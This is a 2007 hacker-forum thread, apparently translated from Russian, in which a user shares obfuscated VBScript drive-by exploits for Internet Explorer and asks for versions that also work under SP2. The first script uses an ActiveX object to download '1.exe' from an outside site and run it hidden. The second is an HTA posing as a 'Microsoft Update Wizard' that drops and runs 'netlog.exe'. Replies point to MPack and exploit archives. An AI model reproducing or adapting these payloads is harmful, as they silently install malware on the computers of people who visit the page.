ANTICHAT Forum


4uTeP 24.09.2007 18:05

Question about an exploit for IE
 
I have an exploit:
<html>
<body>
<script language="VBScript">
on error resume next
xurl_0="http://САЙТ точка рУ /1.exe"
wbb61f=""
ibb72o="A"
fbb83u="dodb.Stream"
ess01a="Microsoft.XMLH"
uss12h="T"
vss83s="TP"
mcc11h="clsid:BD96C556-65A3-11D0-983A-00C04FC29"
xcc22r="E"
xcc33n="36"
boo71b="Scrip"
doo52e="t"
koo23v="ing.FileSystemObject"
djj61a="obj"
ajj82p="e"
hjj03t="ct"
kcl11r="cla"
mcl42e="s"
lcl63c="sid"
tse41c="Shell.Appli"
bse72h="c"
yse43t="ation"
l5sus0=ess01a&uss12h&vss83s
h3b2bp=wbb61f&ibb72o&fbb83u
c2cac2=mcc11h&xcc22r&xcc33n
j0o2ok=boo71b&doo52e&koo23v
h7jdj8=djj61a&ajj82p&hjj03t
o5l8lo=kcl11r&mcl42e&lcl63c
t0eke8=tse41c&bse72h&yse43t
Set j5d5fa = document.createElement(h7jdj8)
j5d5fa.setAttribute o5l8lo, c2cac2
set x0f5b = j5d5fa.createobject(j0o2ok,"")
set e1x3j = j5d5fa.CreateObject(l5sus0,"")
set h4sm7 = j5d5fa.CreateObject(h3b2bp,"")
set d8qr6 = j5d5fa.CreateObject(t0eke8,"")
set cte2mp = x0f5b.GetSpecialFolder(2)
h4sm7.type = 1
q1get="GET"
e1x3j.Open q1get, xurl_0, False
e1x3j.Send
a5L_xy30= "1.exe"
a5L_xy30= x0f5b.BuildPath(cte2mp,a5L_xy30)
h4sm7.open
h4sm7.write e1x3j.responseBody
h4sm7.savetofile a5L_xy30,2
h4sm7.close
d8qr6.ShellExecute a5L_xy30,"","","open",0
</script>
</body>
</html>


But it doesn't work for everyone (under Windows). Does anyone have another script??
If you do, leave it in the thread. Thanks.

Zitt 24.09.2007 18:21

MPack.... look on the hack portals...

Termin@L 24.09.2007 18:36

As I understand it, it runs an exe;
xurl_0="http://САЙТ точка рУ /1.exe" - did you change that?

P.S. Is there even an IE for Unix????

gibson 24.09.2007 18:58

There is a dedicated thread on exploits for IE, head over here:
http://forum.antichat.ru/thread24465-exploit.html
And in general, visit milw0rm more often.

mr.The 24.09.2007 21:12

Author, this is the place for you:
http://milw0rm.com/

4uTeP 29.09.2007 03:23

On milw0rm I either searched badly or didn't find what I need.
>gibson I didn't find anything good in that thread..
>Termin@L I changed it, I changed it. I need it to work under SP2 too.
Here is another one, as an .HTA



<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
self.MoveTo 6000,6000
z=""
a="4"+"D"+"5"+"A"
z=z+(h(a))
FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
IESetup.Write(z)
IESetup.Close()
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
self.Close
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
m=1
H2=H2&Chr("&h"&Mid(H1,H3,2))
m=0
Next
H=H2
End Function
</SCRIPT></BODY></HTML>

It creates netlog.exe in C:. The script is old but working, only I just can't manage to decode the symbols and change it to suit myself.

